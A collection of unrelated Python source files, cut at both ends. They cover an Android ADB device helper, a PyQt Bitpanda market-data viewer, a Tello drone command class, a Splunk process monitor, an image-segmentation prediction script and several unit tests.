break
else:
return ''
for index, char in enumerate(ipv4_list):
# ipv4_address, which we need, is behind of 'inet'
if char == 'inet':
# example of ipv4_address: 192.168.110.111/23
return ipv4_list[index+1].split('/')[0]
return ''
def get_device_resolution(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell dumpsys window displays', shell=True, \
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.returncode != 0:
raise ADBError(p.stderr.decode())
output = [line.strip() for line in p.stdout.decode().strip().split('\n')]
for index, char in enumerate(output):
if char and char.startswith('Display'):
# display_str, which we need, is in the next line of 'Display'
display_str = output[index+1]
break
else:
return ''
# example of display: 'init=1080x1920 420dpi cur=1080x1920 app=1080x1794 rng=1080x1017-1794x1731',
for resolution_str in display_str.split():
if resolution_str.startswith('init'):
return resolution_str[len('init='):]
return ''
def get_release_version(self):
p = subprocess.run(f'{adb} -s {self.device_id} shell getprop ro.build.version.release', shell=True, \
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
if p.returncode != 0:
raise ADBError(p.stderr.decode())
return p.stdout.decode().strip()
def to_dict(self):
device_info = {k: self.__dict__[k] for k in self.__dict__ if not k.startswith('_')}
# get additional device info
prop_lines = self.device_info
if not prop_lines:
return device_info
for line in prop_lines:
# 基带版本
if 'ro.build.expect.baseband' in line:
baseband = line[line.rfind('[')+1:line.rfind(']')].strip()
device_info['baseBand'] = baseband
# 版本号
if 'ro.build.id' in line:
build_id = line[line.rfind('[') + 1:line.rfind(']')].strip()
device_info['buildId'] = build_id
# Android 版本
if 'ro.build.version.release' in line:
build_version = line[line.rfind('[') + 1:line.rfind(']')].strip()
device_info['releaseVersion'] = build_version
return device_info
def adb_command_executor(self, command):
command = command.strip()
isAdbCommand = command.startswith('adb ')
if isAdbCommand:
command_adb, command_options = command.split(' ', 1)
command = f'{command_adb} -s {self.device_id} {command_options}'
p = subprocess.run(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
return p
def devices():
res = subprocess.run(f'{adb} devices -l', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
output = res.stdout.decode()
err_str = res.stderr.decode()
online_devices = {}
# ADB command error
if res.returncode != 0:
logger.error('Get devices list error' + err_str)
return online_devices
lines = [line for line in output.split('\n') if line and line not in ignore_devices_line]
if len(lines) > 1:
for line in lines[1:]:
device = Device.from_adb_line(line)
online_devices[device.device_id] = device
return online_devices
|
main.py
|
import sys, os
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.uic import loadUi
import random
import numpy as np
from mplwidget import MplWidget
import websocket
import threading
import json
import pprint
import urllib3
import csv
import matplotlib.dates as mdates
import matplotlib.ticker as mticker
from mpl_finance import candlestick_ohlc
import re
class Dialog(QtWidgets.QMainWindow):
def __init__(self):
global pair24hVolume
pair24hVolume = np.array(['0'])
QtWidgets.QMainWindow.__init__(self)
ui_path = os.path.dirname(os.path.abspath(__file__))
loadUi(os.path.join(ui_path,"ui/Main.ui"),self)
self.StatusMessage = "No Connection to Bitpanda API"
self.statusBar.showMessage(self.StatusMessage)
self.bDeapthPlus.clicked.connect(self.zoomInDeapthChart)
self.bDeapthMinus.clicked.connect(self.zoomOutDeapthChart)
self.tabWidget.currentChanged.connect(self.tabWidgetChanged)
self.cBTraidPairs.currentIndexChanged.connect(self.cBTraidPairsChanged)
self.chBNow.stateChanged.connect(self.checkBoxNowChanged)
self.bImport.clicked.connect(self.csvImport)
self.zoomDeapthChart = 0.1
self.dateFormat = re.compile('.{4}-.{2}-.{2}')
self.time = '2019-08-07T11:00:00.080Z'
self.RepeatingEventTimer = QtCore.QTimer()
self.RepeatingEventTimer.timeout.connect(self.RepeatingEvents)
self.RepeatingEventTimer.start(10000)
self.getServerTime()
self.fillInitial()
# sub=json.dumps({'type': 'SUBSCRIBE','channels': [{'name': 'MARKET_TICKER','instrument_codes': ['PAN_BTC','BTC_EUR','MIOTA_BTC','MIOTA_EUR','ETH_EUR']}]})
# ws.send(sub)
def RepeatingEvents(self):
if self.tabWidget.currentIndex() == self.tabWidget.indexOf(self.tabHome):
print("Home")
elif self.tabWidget.currentIndex() == self.tabWidget.indexOf(self.tabDataView):
self.cBTraidPairsChanged()
elif self.tabWidget.currentIndex() == self.tabWidget.indexOf(self.tabDataImport):
print("DataImport")
elif self.tabWidget.currentIndex() == self.tabWidget.indexOf(self.tabConfig):
print("Config")
def tabWidgetChanged(self,i):
if i == self.tabWidget.indexOf(self.tabHome):
print("Home")
elif i == self.tabWidget.indexOf(self.tabDataView):
print("DataView")
#self.plotDeapthChart(self.zoomDeapthChart)
elif i == self.tabWidget.indexOf(self.tabDataImport):
print("DataImport")
elif i == self.tabWidget.indexOf(self.tabConfig):
print("Config")
def cBTraidPairsChanged(self):
res = http.request('GET','https://api.exchange.bitpanda.com/public/v1/candlesticks/'+self.cBTraidPairs.currentText()+'?unit=DAYS&period=1&from=2019-08-07T11:00:00.080Z&to='+self.time)
data=json.loads(res.data.decode('utf-8'))
currency = self.cBTraidPairs.currentText()
[_,csell]=currency.split("_")
self.lVolume24h.setText(str(float(data[-1]['volume']))+' '+csell)
self.lVolume1Days.setText(str(float(data[-2]['volume']))+' '+csell)
self.lVolume2Days.setText(str(float(data[-3]['volume']))+' '+csell)
self.lVolume3Days.setText(str(float(data[-4]['volume']))+' '+csell)
self.lVolume4Days.setText(str(float(data[-5]['volume']))+' '+csell)
self.lVolume5Days.setText(str(float(data[-6]['volume']))+' '+csell)
#self.lVolume24h.setText(str(pair24hVolume[self.cBTraidPairs.currentIndex()]))
self.plotDeapthChart(self.zoomDeapthChart)
self.plotCandleChart(data)
def plotCandleChart(self,data):
res = http.request('GET','https://api.exchange.bitpanda.com/public/v1/candlesticks/'+self.cBTraidPairs.currentText()+'?unit=HOURS&period=4&from=2019-08-08T11:00:00.080Z&to='+self.time)
data=json.loads(res.data.decode('utf-8'))
n=len(data)
quotes = np.empty((n,0)).tolist()
i=0
# Candle Chart
# for instance in data:
# quotes[i].append(mdates.datestr2num(str(instance['time'][0:19].replace('T',' '))))
# quotes[i].append(float(instance['open']))
# quotes[i].append(float(instance['high']))
# quotes[i].append(float(instance['low']))
# quotes[i].append(float(instance['close']))
# i+=1
# Heikin Ashi Chart
for instance in data:
quotes[i].append(mdates.datestr2num(str(instance['time'][0:19].replace('T',' '))))
if(i == 0):
quotes[i].append(float(instance['open']))
else:
quotes[i].append(float((quotes[i-1][1]+quotes[i-1][4])/2.0))
quotes[i].append(np.maximum(float(instance['high']),quotes[i][1]))
quotes[i].append(np.minimum(float(instance['low']),quotes[i][1]))
quotes[i].append(float((float(instance['close'])+float(instance['open'])+float(instance['high'])+float(instance['low']))/4.0))
i+=1
self.mplCandleChart.canvas.axes.clear()
candlestick_ohlc(self.mplCandleChart.canvas.axes, quotes,width=0.05)
self.mplCandleChart.canvas.axes.set_xlabel('Date')
self.mplCandleChart.canvas.axes.set_ylabel('Price')
self.mplCandleChart.canvas.draw()
def plotDeapthChart(self,cmdZoom):
res = http.request('GET','https://api.exchange.bitpanda.com/public/v1/order-book/'+self.cBTraidPairs.currentText()+'?level=2')
data=json.loads(res.data.decode('utf-8'))
currency=data['instrument_code']
[cbuy,csell]=currency.split("_")
bids=data['bids']
asks=data['asks']
bidprices = np.array([])
askprices = np.array([])
bidamount = np.array([])
askamount = np.array([])
for bid in bids:
bidprices=np.insert(bidprices,0,float(bid['price']))
try:
bidamount=np.insert(bidamount,0,bidamount[0]+float(bid['amount']))
except:
bidamount=np.insert(bidamount,0,float(bid['amount']))
for ask in asks:
askprices=np.append(askprices,float(ask['price']))
try:
askamount=np.append(askamount,askamount[-1]+float(ask['amount']))
except:
askamount=np.append(askamount,float(ask['amount']))
middleprice=(bidprices[-1]+askprices[0])/2
#prices=np.append(bidprices,askprices)
#amount=np.append(bidamount,askamount)
self.mplDeapthChart.canvas.axes.clear()
self.mplDeapthChart.canvas.axes.plot(bidprices,bidamount,'g',askprices,askamount,'r')
self.mplDeapthChart.canvas.axes.set_xlim([(1-cmdZoom)*middleprice,(1+cmdZoom)*middleprice])
self.mplDeapthChart.canvas.axes.set_ylim([0,np.maximum(bidamount[self.findNearestIndex(bidprices,(1-cmdZoom)*middleprice)]*1.1,1.1*askamount[self.findNearestIndex(askprices,(1+cmdZoom)*middleprice)])])
#self.mplDeapthChart.canvas.axes.set_title('Deapth-Chart '+ currency+'\nMiddle Price:'+ str(middleprice)+csell)
self.lDeapthPrice.setText(str(middleprice)+' '+csell)
self.mplDeapthChart.canvas.axes.set_xlabel('Price ['+csell+']')
self.mplDeapthChart.canvas.axes.set_ylabel('Amount ['+cbuy+']')
self.mplDeapthChart.canvas.draw()
def zoomInDeapthChart(self):
if (self.zoomDeapthChart-0.1) > 0.001:
self.zoomDeapthChart-=0.1
self.plotDeapthChart(self.zoomDeapthChart)
print(self.zoomDeapthChart)
def zoomOutDeapthChart(self):
self.zoomDeapthChart+=0.1
self.plotDeapthChart(self.zoomDeapthChart)
print(self.zoomDeapthChart)
def csvImport(self):
self.pBImport.setValue(0)
[number, period] = self.cBCandlestickPeriod.currentText().split(' ')
if self.dateFormat.match(self.tBFrom.displayText()) and self.dateFormat.match(self.tBTo.displayText()) and len(self.tBFrom.displayText())==10 and len(self.tBTo.displayText())==10:
[j,m,d]=self.tBFrom.displayText().split('-')
[j1,m1,d1]=self.tBTo.displayText().split('-')
try:
int(j)
int(j1)
int(m)
int(m1)
int(d)
int(d1)
except:
print("No Int")
return
fromDateNum = mdates.datestr2num(self.tBFrom.displayText())
toDateNum = mdates.datestr2num(self.tBTo.displayText())
else:
print("No Valid Pattern")
return
csvDatei=open('import/'+self.cBTraidPairs_2.currentText()+'p'+number+period+'f'+self.tBFrom.displayText()+'t'+self.tBTo.displayText()+'.csv','w+',newline='')
csvwriter = csv.writer(csvDatei)
csvwriter.writerow(['high','low','open','close','volume','time'])
diffDays = toDateNum-fromDateNum
itterations = np.ceil(diffDays)
print(itterations)
if itterations == 1:
stop = toDateNum
start = fromDateNum
else:
start = fromDateNum
stop = start+1
if self.chBNow.checkState() == 2:
itterations +=1
for i in range(0,int(itterations)):
print(str(mdates.num2date(start))[0:10])
print(str(mdates.num2date(stop))[0:10])
if self.chBNow.checkState() == 2 and i == int(itterations)-1:
self.getServerTime()
res = http.request('GET','https://api.exchange.bitpanda.com/public/v1/candlesticks/'+self.cBTraidPairs_2.currentText()+'?unit='+period+'&period='+number+'&from='+self.time[0:10]+'T00:00:00.080Z&to='+self.time)
stop = start
else:
res = http.request('GET','https://api.exchange.bitpanda.com/public/v1/candlesticks/'+self.cBTraidPairs_2.currentText()+'?unit='+period+'&period='+number+'&from='+str(mdates.num2date(start))[0:10]+'T00:00:00.080Z&to='+str(mdates.num2date(stop))[0:10]+'T00:00:00.090Z')
start = stop
if start+1<toDateNum:
stop = start+1
else:
stop = toDateNum
data=json.loads(res.data.decode('utf-8'))
try:
if data['error'] == 'CANDLESTICKS_TIME_RANGE_TOO_BIG':
print("CANDLESTICKS_TIME_RANGE_TOO_BIG")
return
except:
pass
for interval in data:
interval.pop('last_sequence')
interval.pop('granularity')
interval.pop('instrument_code')
interval['time']=interval['time'][11:23]
csvwriter.writerow(interval.values())
self.pBImport.setValue(int((i+1)/float(itterations)*100))
csvDatei.close()
def fillInitial(self):
# Fill Candlestick Periods
self.cBCandlestickPeriod.addItem("1 MINUTES")
self.cBCandlestickPeriod.addItem("5 MINUTES")
self.cBCandlestickPeriod.addItem("15 MINUTES")
self.cBCandlestickPeriod.addItem("30 MINUTES")
self.cBCandlestickPeriod.addItem("1 HOURS")
self.cBCandlestickPeriod.addItem("4 HOURS")
self.cBCandlestickPeriod.addItem("1 DAYS")
self.cBCandlestickPeriod.addItem("1 WEEKS")
self.cBCandlestickPeriod.addItem("1 MONTHS")
# Fill textBoxes
self.tBFrom.setText("2019-08-07")
self.tBTo.setText(self.time[0:10])
# Fill Traiding Pairs
res = http.request('GET','https://api.exchange.bitpanda.com/public/v1/instruments')
data=json.loads(res.data.decode('utf-8'))
for pair in data:
self.cBTraidPairs.addItem(pair['base']['code']+"_"+pair['quote']['code'])
self.cBTraidPairs_2.addItem(pair['base']['code']+"_"+pair['quote']['code'])
def getServerTime(self):
res = http.request('GET','https://api.exchange.bitpanda.com/public/v1/time')
data=json.loads(res.data.decode('utf-8'))
self.time = data['iso']
def findNearestIndex(self,array, value):
array = np.asarray(array)
idx = (np.abs(array - value)).argmin()
# return (array[idx],idx)
return idx
def checkBoxNowChanged(self):
if self.chBNow.checkState() == 2:
self.tBTo.setEnabled(False)
self.tBTo.setText(self.time[0:10])
else:
self.tBTo.setEnabled(True)
def on_message(ws, message):
msg=json.loads(message)
print(msg)
if msg['type']!="HEARTBEAT" and msg['type']!="PRICE_POINT_UPDATES" :
ffile.write('\n{}'.format(message))
def on_error(ws, error):
print("Error")
print('ERROR: {}'.format(error))
def on_close(ws):
print("### closed ###")
def on_open(ws):
print("### conection opend ###")
def startWebSocket():
ws.run_forever(suppress_origin=1,ping_timeout = 20)
def startWindow():
window.show()
if __name__ == "__main__":
global ws,ffile,window,check
#load Config
config=open("config.json","r")
cdata=json.load(config)
#Starting
http=urllib3.PoolManager()
#websocket Config and Start
websocket.enableTrace(cdata['enableWebsocketTrace'])
ws = websocket.WebSocketApp(cdata['url'],
on_open = on_open,
on_message = on_message,
on_error = on_error,
on_close = on_close)
socketThread = threading.Thread(target=startWebSocket)
socketThread.start()
ffile=open("recv.txt", "a+")
#App Start
app = QtWidgets.QApplication(sys.argv)
window = Dialog()
windowThread = threading.Thread(target=window.show())
windowThread.start()
check = 0
while check == 0:
inp=input()
if inp == "sub":
sub=json.dumps({"type": "SUBSCRIBE","channels": [{"name": "PRICE_TICKS","instrument_codes": ["BTC_EUR","ETH_EUR"]}]})
ws.send(sub)
if inp == "unsub":
unsub=json.dumps({"type": "UNSUBSCRIBE","channels": ["PRICE_TICKS"]})
ws.send(unsub)
if inp == "close":
check=1
ws.close()
ffile.close()
#sys.exit(app.exec_())
|
test_refleaks.py
|
"""Tests for refleaks."""
from cherrypy.test import test
test.prefer_parent_path()
import gc
import httplib
import threading
import cherrypy
from cherrypy import _cprequest
data = object()
def get_instances(cls):
return [x for x in gc.get_objects() if isinstance(x, cls)]
def setup_server():
class Root:
def index(self, *args, **kwargs):
cherrypy.request.thing = data
return "Hello world!"
index.exposed = True
def gc_stats(self):
output = ["Statistics:"]
# Uncollectable garbage
# gc_collect isn't perfectly synchronous, because it may
# break reference cycles that then take time to fully
# finalize. Call it twice and hope for the best.
gc.collect()
unreachable = gc.collect()
if unreachable:
output.append("\n%s unreachable objects:" % unreachable)
trash = {}
for x in gc.garbage:
trash[type(x)] = trash.get(type(x), 0) + 1
trash = [(v, k) for k, v in trash.iteritems()]
trash.sort()
for pair in trash:
output.append(" " + repr(pair))
# Request references
reqs = get_instances(_cprequest.Request)
lenreqs = len(reqs)
if lenreqs < 2:
output.append("\nMissing Request reference. Should be 1 in "
"this request thread and 1 in the main thread.")
elif lenreqs > 2:
output.append("\nToo many Request references (%r)." % lenreqs)
for req in reqs:
output.append("Referrers for %s:" % repr(req))
for ref in gc.get_referrers(req):
if ref is not reqs:
output.append(" %s" % repr(ref))
# Response references
resps = get_instances(_cprequest.Response)
lenresps = len(resps)
if lenresps < 2:
output.append("\nMissing Response reference. Should be 1 in "
"this request thread and 1 in the main thread.")
elif lenresps > 2:
output.append("\nToo many Response references (%r)." % lenresps)
for resp in resps:
output.append("Referrers for %s:" % repr(resp))
for ref in gc.get_referrers(resp):
if ref is not resps:
output.append(" %s" % repr(ref))
return "\n".join(output)
gc_stats.exposed = True
cherrypy.tree.mount(Root())
cherrypy.config.update({'environment': 'test_suite'})
from cherrypy.test import helper
class ReferenceTests(helper.CPWebCase):
def test_threadlocal_garbage(self):
success = []
def getpage():
host = '%s:%s' % (self.interface(), self.PORT)
if self.scheme == 'https':
c = httplib.HTTPSConnection(host)
else:
c = httplib.HTTPConnection(host)
try:
c.putrequest('GET', '/')
c.endheaders()
response = c.getresponse()
body = response.read()
self.assertEqual(response.status, 200)
self.assertEqual(body, "Hello world!")
finally:
c.close()
success.append(True)
ITERATIONS = 25
ts = []
for _ in range(ITERATIONS):
t = threading.Thread(target=getpage)
ts.append(t)
t.start()
for t in ts:
t.join()
self.assertEqual(len(success), ITERATIONS)
self.getPage("/gc_stats")
self.assertBody("Statistics:")
if __name__ == '__main__':
setup_server()
helper.testmain({'server.socket_queue_size': 10})
|
common.py
|
import json
import threading
import logging
from qupy.comm import common
from qupy.interface import AbstractInterface
from qupy.framing import AbstractFraming
from qupy.framing.errors import FramingDecodeError
log = logging.getLogger(__name__)
_DATA_FORMAT_CONVERTERS = {
'binary': {
'decoder': lambda rx_bytes: bytes(rx_bytes),
'encoder': lambda tx_bytes: bytes(tx_bytes),
},
'string': {
'decoder': lambda rx_bytes: rx_bytes.decode('utf-8'),
'encoder': lambda string: bytes(string, 'utf-8'),
},
'json': {
'decoder': lambda rx_bytes: json.loads(rx_bytes.decode('utf-8')),
'encoder': lambda json_string: bytes(json.dumps(json_string), 'utf-8')
}
}
def get_data_format_converter(data_format):
return _DATA_FORMAT_CONVERTERS.get(data_format)
class CommBase:
def __init__(self, interface: AbstractInterface, framing: AbstractFraming):
self.interface = interface
self.framing = framing
self._stop_cond = threading.Condition()
self._stop_flag = False
self._thread = None
def _before_worker_start(self):
pass
def start(self):
log.debug('Starting...')
with self._stop_cond:
self._stop_flag = False
self._before_worker_start()
self._thread = threading.Thread(target=self._worker_loop)
self._thread.setDaemon(True)
self._thread.start()
def stop(self):
if self._thread is None:
log.warning('Already stopped')
return
log.debug('Stopping...')
self._stop_cond.acquire()
self._stop_flag = True
self._stop_cond.wait()
self._stop_cond.release()
self._thread = None
def _send_to(self, tx_queue, message, **kwargs):
if isinstance(message, bytes):
data_format = 'binary'
elif isinstance(message, str):
data_format = 'string'
else:
data_format = 'json'
frame_bytes = common.get_data_format_converter(data_format).get('encoder')(message) if message is not None else None
request = dict(message=frame_bytes, **kwargs)
tx_queue.put(request)
def _recv_from(self, rx_queue, data_format='binary'):
response = rx_queue.get()
error = response.get('error')
if error:
raise error
frame_bytes = response.get('message')
converter = common.get_data_format_converter(data_format)
if not converter:
raise TypeError('Unsupported data format')
message = converter.get('decoder')(frame_bytes)
return message
def _is_stop(self):
self._stop_cond.acquire()
if self._stop_flag:
return True
self._stop_cond.release()
return False
def _parse_rx_bytes(self, rx_bytes):
message = None
for byte in rx_bytes:
try:
message = self.framing.decode_frame(byte)
except FramingDecodeError as e:
log.warning(str(e))
if message is not None:
break
return message
def _worker(self):
raise NotImplementedError('_worker method must be implemented')
def _worker_loop(self):
log.debug('Started')
while not self._worker():
pass
self._stop_cond.notify()
self._stop_cond.release()
log.debug('Stopped')
|
TelloCommand.py
|
import time
import socket
from threading import Thread
"""
Class Description:
TelloCommand is a utility class to send commands to the Tello drone.
Public Attributes: None
Public Methods:
- start # start the drone communication
- stop # stop the drone communication
- send # send a command to the drone
- send_rc # send an RC command to the drone
"""
class TelloCommand:
__debug = False # Print debug output or not
__IP = '192.168.10.1' # IP address of the Tello Drone
__PORT = 8889 # UDP port for drone commands
__socket = None # The socket connection with the drone
__thread = None # The thread object to control thread execution
__thread_started = False # Flag to determine if the thread is running
__TIMEOUT = 10 # Time (seconds) to wait for a command response
__COMM_DELAY = 0.1 # Minimum delay between each discrete command
__RC_DELAY = 0.001 # Minimum delay between each RC command
__last_command_time = 0 # Time when the last discrete command was issued
__last_rc_command_time = 0 # Time when the last RC command was issued
__current_response = None # String containig the most recent Tello response (or None)
"""
Constructor that creates the socket connection and the thread to receive responses
"""
def __init__(self, debug: bool=True):
self.__debug = debug
# Open local UDP port for Tello communication
self.__socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.__socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.__socket.bind(('', self.__PORT))
# Bind the thread to receive responses from the drone
self.__thread = Thread(target=self.__thread_function, daemon=True)
"""
Destructor that only closes the socket when the object is deleted because sockets are not thread safe
"""
def __del__(self):
self.__socket.close()
"""
A thread that continuously checks for a response from the drone.
If there is a response, then it updates self.__current_response with the message.
"""
def __thread_function(self):
while self.__thread_started:
try:
response, ip = self.__socket.recvfrom(1024)
if self.__debug:
print('[TelloCommand]: {}'.format(response))
self.__current_response = response.decode("utf-8").rstrip("\r\n")
except (UnicodeDecodeError, socket.error) as err:
print('[TelloCommand] Error: {}'.format(err))
"""
Begin drone communication
"""
def start(self):
# Start the receive thread
self.__thread_started = True
self.__thread.start()
# Set drone in command mode
if self.send('command') != "ok":
raise Exception('[TelloCommand] Failed to connect to the Tello drone.')
"""
Stop drone communication
"""
def stop(self):
self.__thread_started = False
"""
Send a command to the drone
Argument: a string command based off the TelloSDK
Return: String response from the drone or None if timed out
"""
def send(self, command: str):
# Wait at least __COMM_DELAY between commands
delay = time.time() - self.__last_command_time
if delay < self.__COMM_DELAY:
time.sleep(delay)
# Reset the current response and send the command to the drone over the socket
self.__current_response = None
self.__socket.sendto(command.encode('utf-8'), (self.__IP,self.__PORT))
if self.__debug is True:
print('[TelloCommand] Command Sent: {}'.format(command))
# Every 0.1s, check whether the response was received (in the thread function)
timestamp = time.time()
while not self.__current_response:
if time.time() - timestamp > self.__TIMEOUT:
print('[TelloCommand] Timeout. Aborting Command: \'{}\'.'.format(command))
return None
time.sleep(0.1)
# Log the last successful command time
self.__last_command_time = time.time()
# Return the response string
if self.__debug is True:
print('[TelloCommand] Response Received: {}'.format(self.__current_response))
return self.__current_response.lower()
"""
Send an RC command to the drone
Arguments: four velocities – v_lr (left/right), v_fb (front/back), v_ud (up/down), v_yaw (rotation)
Return: None
"""
def send_rc(self, v_lr: int, v_fb: int, v_ud: int, v_yaw: int):
# Only send if enough time between commands has elapsed
if time.time() - self.__last_rc_command_time < self.__RC_DELAY:
return
# Clamp the values between -100 to 100 (required by the Tello SDK)
clamp100 = lambda x : max(-100, min(100, x))
v_lr = clamp100(v_lr)
v_fb = clamp100(v_fb)
v_ud = clamp100(v_ud)
v_yaw = clamp100(v_yaw)
# Send the command to the drone via the socket
command = 'rc {} {} {} {}'.format(v_lr, v_fb, v_ud, v_yaw)
self.__socket.sendto(command.encode('utf-8'), (self.__IP,self.__PORT))
if self.__debug is True:
print('[TelloCommand] RC Command Sent: {}'.format(command))
|
orphan_process_monitor.py
|
from builtins import object
import os
import threading
import time
import traceback
from ..splunktalib.common import log
class OrphanProcessChecker(object):
def __init__(self, callback=None):
"""
Only work for Linux platform. On Windows platform, is_orphan is always
False
"""
if os.name == "nt":
self._ppid = 0
else:
self._ppid = os.getppid()
self._callback = callback
def is_orphan(self):
if os.name == "nt":
return False
res = self._ppid != os.getppid()
if res:
log.logger.warn("Process=%s has become orphan", os.getpid())
return res
def check_orphan(self):
res = self.is_orphan()
if res and self._callback:
self._callback()
return res
class OrphanProcessMonitor(object):
def __init__(self, callback):
self._checker = OrphanProcessChecker(callback)
self._thr = threading.Thread(target=self._do_monitor)
self._thr.daemon = True
self._started = False
def start(self):
if self._started:
return
self._started = True
self._thr.start()
def stop(self):
self._started = False
def _do_monitor(self):
while self._started:
try:
res = self._checker.check_orphan()
if res:
break
time.sleep(1)
except Exception:
log.logger.error("Failed to monitor orphan process, reason=%s",
traceback.format_exc())
|
val_submit.py
|
import cv2
import numpy as np
import pandas as pd
import threading
import Queue
import tensorflow as tf
from tensorflow.python.client import device_lib
from tqdm import tqdm
import params
import os
input_size = params.input_size
batch_size = params.test_batch_size
orig_width = params.orig_width
orig_height = params.orig_height
threshold = params.threshold
model_factory = params.model_factory
# phase and percentage config
PHASE = 0
PERCENT = 1.05
new_height, new_width, rmin, rmax, cmin, cmax = params.getPoint(PERCENT, PHASE)
print new_height, new_width, rmin, rmax, cmin, cmax
# gpu setting
gpu_id = '1'
os.environ['CUDA_VISIBLE_DEVICES']=str(gpu_id)
gpus = [x.name for x in device_lib.list_local_devices() if x.name[:4] == '/gpu']
# path setting
DATA_PATH = '/media/Disk/yanpengxiang/dataset/carvana/'
SAVE_PATH = '/media/Disk/yanpengxiang/Unet/output/val' + str(int(PERCENT * 100)) + '/'
if os.path.isdir(SAVE_PATH) == False:
os.makedirs(SAVE_PATH)
df_test = pd.read_csv('/media/Disk/yanpengxiang/dataset/carvana/train_masks.csv')
ids_test = np.array(df_test['img'].map(lambda s: s.split('.')[0]).values)
## read txt ##
# test_list = open('list/test_hard.txt')
# df_test = test_list.readlines()
# ids_test = []
# for i in xrange(len(df_test)):
# ids_test.append(df_test[i][:15])
# ids_test = np.array(ids_test)
names = []
rles = []
q_size = 10
for id in ids_test:
names.append('{}.jpg'.format(id))
# https://www.kaggle.com/stainsby/fast-tested-rle
def run_length_encode(mask):
'''
img: numpy array, 1 - mask, 0 - background
Returns run length as string formated
'''
inds = mask.flatten()
runs = np.where(inds[1:] != inds[:-1])[0] + 2
runs[1::2] = runs[1::2] - runs[:-1:2]
rle = ' '.join([str(r) for r in runs])
return rle
def create_model(gpu):
with tf.device(gpu):
model = model_factory()
model.load_weights(filepath='weights/save/acc09969.hdf5')
return model
def data_loader(q, ):
for start in tqdm(range(0, len(ids_test), batch_size)):
x_batch = []
end = min(start + batch_size, len(ids_test))
ids_test_batch = ids_test[start:end]
for id in ids_test_batch:
img = cv2.imread((DATA_PATH+'train/{}.jpg').format(id))
if input_size is not None:
if new_width != orig_width:
img = cv2.resize(img, (new_width, new_height))
img = img[rmin:rmax, cmin:cmax]
x_batch.append(img)
x_batch = np.array(x_batch, np.float32) / 255
q.put((ids_test_batch, x_batch))
for g in gpus:
q.put((None, None))
def predictor(q, gpu):
PHASE_CHAR = str(PHASE)
config = tf.ConfigProto()
config.allow_soft_placement=True
config.gpu_options.allow_growth=True
sess = tf.Session(config=config)
with sess.as_default():
model = create_model(gpu)
while True:
ids, x_batch = q.get()
if ids is None:
break
preds = model.predict_on_batch(x_batch)
preds = np.squeeze(preds, axis=3)
for i,pred in enumerate(preds):
if input_size is not None:
prob = pred
#mask = np.zeros_like(prob)
#mask[prob>threshold] = 255
mask = prob * 255
id = ids[i]
cv2.imwrite(SAVE_PATH + id + '_mask_' + PHASE_CHAR + '.png', mask)
print('Predicting on {} samples with batch_size = {}...'.format(len(ids_test), batch_size))
q = Queue.Queue(maxsize=q_size)
threads = []
threads.append(threading.Thread(target=data_loader, name='DataLoader', args=(q,)))
threads[0].start()
for gpu in gpus:
print("Starting predictor at device " + gpu)
t = threading.Thread(target=predictor, name='Predictor', args=(q, gpu))
threads.append(t)
t.start()
# Wait for all threads to finish
for t in threads:
t.join()
#print("Generating submission file...")
#df = pd.DataFrame(rles, columns=['img', 'rle_mask'])
#df['img'] += '.jpg'
#df.to_csv('submit/submission.csv.gz', index=False, compression='gzip')
|
test_proxy.py
|
# -*- coding: utf8 -*-
# Copyright (c) 2019 Niklas Rosenstein
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
import threading
from collections import abc
from nr.proxy import *
import pytest
def test_proxy():
p = proxy(lambda: None)
assert p == None
# An unfortunate behavior, that is why we have the #make_cls()
# function (see #test_proxy_iterable() below.
assert isinstance(p, abc.Iterable)
# TODO(NiklasRosenstein): Why does it not behave like abc.Iterable?
assert not isinstance(p, abc.Mapping)
def test_proxy_iterable():
NonIterableProxy = make_cls('NonIterableProxy', exclude=['__iter__'])
print(NonIterableProxy)
print(NonIterableProxy.__bases__)
p = NonIterableProxy(lambda: None)
assert p == None
assert not hasattr(p, '__iter__')
assert not hasattr(NonIterableProxy, '__iter__')
assert not isinstance(p, abc.Mapping)
assert not isinstance(p, abc.Iterable), NonIterableProxy.__mro__
NonIterableLazyProxy = make_cls('NonIterableLazyProxy', exclude=['__iter__'])
def _func():
count[0] += 1
return count[0]
p = NonIterableLazyProxy(_func, lazy=True)
count = [0]
assert p == 1
assert p == 1
assert p == 1
assert not hasattr(p, '__iter__')
assert not hasattr(NonIterableProxy, '__iter__')
assert not isinstance(p, abc.Mapping)
assert not isinstance(p, abc.Iterable), NonIterableProxy.__mro__
def test_proxy_auto_increment():
count = [0]
def auto_increment_():
count[0] += 1
return count[0]
auto_increment = proxy(auto_increment_)
assert auto_increment == 1
assert auto_increment == 2
assert auto_increment + 10 == 13
assert count[0] == 3
def test_proxy_lazy_not_auto_increment():
count = [0]
def auto_increment_():
count[0] += 1
return count[0]
auto_increment = proxy(auto_increment_, lazy=True)
assert auto_increment == 1
assert auto_increment == 1
assert auto_increment == 1
assert count[0] == 1
def test_threadlocal():
l = threadlocal[int]()
sink = set()
lock = threading.Lock()
def _run(value: int):
for i in range(1000):
assert empty(l)
push(l, value)
assert not empty(l)
assert get(l) == value
assert pop(l) == value
assert empty(l)
with lock:
sink.add(value)
threads = [
